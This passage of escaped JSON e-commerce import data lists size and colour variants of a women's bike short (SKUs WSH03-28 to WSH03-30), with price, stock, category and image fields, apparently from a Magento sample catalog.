Individually\",\"price\":\"50\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gwen-drawstring-bike-short-28-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh03-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh03-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh03-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh03-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh03-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Blue\"},\"1890\":{\"sku\":\"WSH03-28-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Gwen Drawstring Bike Short-28-Gray\",\"description\":\"<p>For a completely modern style with moisture-wicking CoolTech&trade; technology, try the Gwen Drawstring Bike Short. Subtle grays and eye catching stitching combine with an adjustable waist for the perfect look and fit.<\\/p>\\n<p>&bull; Dark heather gray rouched bike shorts.<br \\/>&bull; Fitted. Inseam: 2\\\". <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"50\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gwen-drawstring-bike-short-28-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh03-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh03-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh03-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh03-gray_alt1.jpg,\\/w\\/s\\/wsh03-gray_back.jpg\",\"image\":\"\\/w\\/s\\/wsh03-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh03-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh03-gray_alt1.jpg,\\/w\\/s\\/wsh03-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Gray\"},\"1891\":{\"sku\":\"WSH03-28-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Gwen Drawstring Bike Short-28-Orange\",\"description\":\"<p>For a completely modern style with moisture-wicking CoolTech&trade; technology, try the Gwen Drawstring Bike Short. Subtle grays and eye catching stitching combine with an adjustable waist for the perfect look and fit.<\\/p>\\n<p>&bull; Dark heather gray rouched bike shorts.<br \\/>&bull; Fitted. Inseam: 2\\\". <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"50\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gwen-drawstring-bike-short-28-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh03-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh03-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh03-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=28,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh03-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh03-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"28\",\"color\":\"Orange\"},\"1892\":{\"sku\":\"WSH03-29-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Gwen Drawstring Bike Short-29-Blue\",\"description\":\"<p>For a completely modern style with moisture-wicking CoolTech&trade; technology, try the Gwen Drawstring Bike Short. Subtle grays and eye catching stitching combine with an adjustable waist for the perfect look and fit.<\\/p>\\n<p>&bull; Dark heather gray rouched bike shorts.<br \\/>&bull; Fitted. Inseam: 2\\\". <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"50\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gwen-drawstring-bike-short-29-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh03-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh03-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh03-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh03-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh03-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Blue\"},\"1893\":{\"sku\":\"WSH03-29-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Gwen Drawstring Bike Short-29-Gray\",\"description\":\"<p>For a completely modern style with moisture-wicking CoolTech&trade; technology, try the Gwen Drawstring Bike Short. Subtle grays and eye catching stitching combine with an adjustable waist for the perfect look and fit.<\\/p>\\n<p>&bull; Dark heather gray rouched bike shorts.<br \\/>&bull; Fitted. Inseam: 2\\\". <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"50\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gwen-drawstring-bike-short-29-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh03-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh03-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh03-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh03-gray_alt1.jpg,\\/w\\/s\\/wsh03-gray_back.jpg\",\"image\":\"\\/w\\/s\\/wsh03-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh03-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh03-gray_alt1.jpg,\\/w\\/s\\/wsh03-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Gray\"},\"1894\":{\"sku\":\"WSH03-29-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Gwen Drawstring Bike Short-29-Orange\",\"description\":\"<p>For a completely modern style with moisture-wicking CoolTech&trade; technology, try the Gwen Drawstring Bike Short. Subtle grays and eye catching stitching combine with an adjustable waist for the perfect look and fit.<\\/p>\\n<p>&bull; Dark heather gray rouched bike shorts.<br \\/>&bull; Fitted. Inseam: 2\\\". <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"50\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gwen-drawstring-bike-short-29-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh03-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh03-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh03-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=29,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh03-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh03-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"29\",\"color\":\"Orange\"},\"1895\":{\"sku\":\"WSH03-30-Blue\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Gwen Drawstring Bike Short-30-Blue\",\"description\":\"<p>For a completely modern style with moisture-wicking CoolTech&trade; technology, try the Gwen Drawstring Bike Short. Subtle grays and eye catching stitching combine with an adjustable waist for the perfect look and fit.<\\/p>\\n<p>&bull; Dark heather gray rouched bike shorts.<br \\/>&bull; Fitted. Inseam: 2\\\". <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"50\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gwen-drawstring-bike-short-30-blue\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh03-blue_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh03-blue_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh03-blue_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=30,color=Blue\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh03-blue_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh03-blue_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"30\",\"color\":\"Blue\"},\"1896\":{\"sku\":\"WSH03-30-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Gwen Drawstring Bike Short-30-Gray\",\"description\":\"<p>For a completely modern style with moisture-wicking CoolTech&trade; technology, try the Gwen Drawstring Bike Short. Subtle grays and eye catching stitching combine with an adjustable waist for the perfect look and fit.<\\/p>\\n<p>&bull; Dark heather gray rouched bike shorts.<br \\/>&bull; Fitted. Inseam: 2\\\". <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"50\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gwen-drawstring-bike-short-30-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh03-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh03-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh03-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=30,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/wsh03-gray_alt1.jpg,\\/w\\/s\\/wsh03-gray_back.jpg\",\"image\":\"\\/w\\/s\\/wsh03-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh03-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/wsh03-gray_alt1.jpg,\\/w\\/s\\/wsh03-gray_back.jpg\",\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"30\",\"color\":\"Gray\"},\"1897\":{\"sku\":\"WSH03-30-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Bottom\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Bottoms\\/Shorts,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Gwen Drawstring Bike Short-30-Orange\",\"description\":\"<p>For a completely modern style with moisture-wicking CoolTech&trade; technology, try the Gwen Drawstring Bike Short. Subtle grays and eye catching stitching combine with an adjustable waist for the perfect look and fit.<\\/p>\\n<p>&bull; Dark heather gray rouched bike shorts.<br \\/>&bull; Fitted. Inseam: 2\\\". <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"50\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"gwen-drawstring-bike-short-30-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/wsh03-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/wsh03-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/wsh03-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=30,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/wsh03-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/wsh03-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Bottom\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\